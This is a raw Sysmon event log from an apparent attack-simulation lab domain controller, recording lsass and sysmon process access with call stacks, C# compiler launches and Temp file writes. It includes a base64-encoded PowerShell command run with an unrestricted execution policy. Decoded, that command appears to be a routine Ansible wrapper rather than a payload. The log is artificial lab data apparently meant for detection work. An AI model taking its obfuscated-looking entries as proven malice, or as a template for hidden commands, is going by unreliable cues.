13:54:08.380{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003467Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.380{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003466Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.380{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003465Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.380{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8580-5FCF-A900-000000009101}4328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003464Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.380{10ACEC4A-8580-5FCF-A800-000000009101}45564776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-8580-5FCF-A900-000000009101}4328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003463Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.387{10ACEC4A-8580-5FCF-A900-000000009101}4328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES15F4.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC1B3ACDD41154FBA89639656ACE37064.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-857E-5FCF-ED48-060000000000}0x648ed0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-8580-5FCF-A800-000000009101}4556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\qo4cdzgk.cmdline" 10341000x80000000000000003462Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.349{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003461Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.349{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003460Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.349{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003459Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.240{10ACEC4A-857E-5FCF-9D00-000000009101}49404980C:\Windows\system32\conhost.exe{10ACEC4A-8580-5FCF-A800-000000009101}4556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003458Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003457Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003456Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003455Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003454Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003453Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003452Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003451Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003450Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.224{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003449Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.224{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8580-5FCF-A800-000000009101}4556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003448Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.224{10ACEC4A-857F-5FCF-A600-000000009101}12522460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8580-5FCF-A800-000000009101}4556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF81929CE4F) 154100x80000000000000003447Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.238{10ACEC4A-8580-5FCF-A800-000000009101}4556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\qo4cdzgk.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-857E-5FCF-ED48-060000000000}0x648ed0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-857F-5FCF-A600-000000009101}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000003446Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.224{10ACEC4A-857F-5FCF-A600-000000009101}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qo4cdzgk.cmdline2020-12-08 13:54:08.224 11241100x80000000000000003445Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:08.224{10ACEC4A-857F-5FCF-A600-000000009101}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qo4cdzgk.dll2020-12-08 13:54:08.224 11241100x80000000000000003617Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.972{10ACEC4A-8581-5FCF-B200-000000009101}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0uf4nmub.q0n.ps12020-12-08 13:54:09.972 10341000x80000000000000003616Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 